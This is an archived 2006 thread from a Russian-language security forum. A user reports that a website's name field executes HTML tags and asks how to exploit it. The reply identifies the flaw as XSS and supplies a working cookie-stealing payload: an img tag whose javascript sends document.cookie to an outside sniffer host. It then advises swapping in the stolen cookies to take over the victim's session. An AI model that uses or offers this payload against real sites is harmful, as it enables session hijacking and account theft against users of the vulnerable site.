ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

При вводе имени работают теги!
  #1  
Старый 01.02.2006, 16:33
Poacher
Новичок
Регистрация: 27.12.2005
Сообщений: 8
Провел на форуме:
16597

Репутация: 0
По умолчанию При вводе имени работают теги!

Здрасти есть один сайт. При вводе имени в форму <form> можно вводить теги и они работают, а при попытке вводить (примерно) <? echo data("s = h = m")?> в тексте оказывается слеши перед кавычками <? echo data(/"s = h = m/")?> и ни че не работает, а простые теги html работают все!

Суть вопроса: на сколько опасна данная уязвимость, и как её лутше использовать.
 
Ответить с цитированием

  #2  
Старый 01.02.2006, 16:54
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

В умелых руках уязвимость довольно опасна! Это так называемая XSS.

пишешь что то типа
<img src=javascript:aa=new&#x20;Image();aa.src=&quot;ht tp://antichat.ru/cgi-bin/s.gif?&quot;+document.cookie;>
и если все пройдет ok на antichat'овский снифер придут куки. Дальше ты свои заменяешь на угнанные куки и юзаешь их по назначению. =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
XSS в PunBB (вложеные теги) KEZ Форумы 7 23.03.2008 23:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ